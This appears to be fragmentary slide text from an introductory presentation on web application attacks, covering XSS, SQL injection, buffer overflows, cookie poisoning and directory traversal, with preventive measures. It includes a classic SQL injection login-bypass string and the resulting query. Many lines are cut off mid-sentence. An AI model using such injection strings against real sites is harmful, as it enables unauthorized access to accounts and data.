In this presentation I have tried to figure out common loop holes through which web applications may fall prey to the attackers, common tools used in the trade and some preventive security measures to put us on a safer side.
Application of an
A client/server software application that
interacts with users or other systems using
Modern applications are typically written
in Java (or similar languages) and run on
distributed application server, connecting
to multiple data sources.
Examples of Web Applications :
ii)Online retail sales
Stealing credit card Information
Exploiting server-side scripting
Exploiting buffer overflows
Employ malicious code
Destruction of Data
PLANNING THE ATTACK
LAUNCHING THE ATTACK
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications which allow code injection by web
users into the web pages viewed by other users.
Stored Attack Reflected Attack
Hacker finds out www. mailprovider.com
suffers from XSS.
Users get mail asking to click a hyperlink
for getting a free gift Click here
For free gift
When the user click
malicious script gets executed.
Your browser correctly interprets this as
script and runs the script
If this script instructs the browser to send a cookie ,
to the hacker's computer, it quickly complies.
May take the user to a fake web page
of his online banking site.
It is basically a security exploit in which
attacker injects SQL code through a web
form input box, address barto gain access to
resources and makes changes to data.
SQL Injection attacks can often be executed from
address bar, from within application fields,
and through queries and searches
var sql = quot;select * from users where username = ' username ' and
password = ' password ' quot; ;
Username: anything‘ or 1=1--
quot; select * from users where username = 'anything' or 1=1--'and
password ='' quot;;
When the amount of data sought to be added to a buffer exceeds the
size of the buffer; generally resulting in a catastrophic error.
when boundary checks are not done fully or skipped.
Error in programming.
After successful execution
Gain super user privilege.
Installation of backdoor.
Put a server down
Zero-day attacks take place between
the time a vulnerability is discovered
by a researcher or attacker, and the time
that the vendor issues a corrective patch.
Most zero-day attacks are only available as hand-crafted
exploit code, but zero-day worms have caused rapid panic.
Zero-day vulnerability is the launching point for further
exploitation of the web application and environment.
Lack of a firewall and enable heuristics scanning.
Cookies are used to maintain session
state in the otherwise stateless HTTP
Poisoning allows an attacker to inject malicious
content, modify the user's on-line experience, and
obtain unauthorized information
It can be used for rewriting the session data, displaying
the cookie data, and/or specifying a new User ID or
other session identifiers in the cookie.
Takes advantage of the hidden field that work as the
only security measure in some applications.
Modifying this hidden field value will cause the web
application to change according tothe new data
theft of services
escalation of access
Attack occurs when the attacker
is able to browse directories and
files outside normal application
Attack exposes the directory structure of the application,
and often the underlying web server and operating system
Attacker can enumerate contents, access secure or
restricted pages, and gain confidential information, locate
source code and so on.
No provision of access right for protected areas of site.
Information in error messages is
often rich with web site-specific
information which can be used to ::
Determine technologies used in the
Determine whether attack attempt was successful or
Receive hints for attack methods to try next.
Validation of query strings, form fields and hidden fields
against a rigorous specification.
Filtering script output .
Structuring request such that all supplied parameters are
treated as data ,rather than potentially executable content.
Validating input length in forms and carrying out bounds
Defining access right to protected areas of website.
Applying checks/hot fixes.
Updating web server with security patches in timely manner.
Digitally signed and stamped logs.
Separate log for system event and transaction log for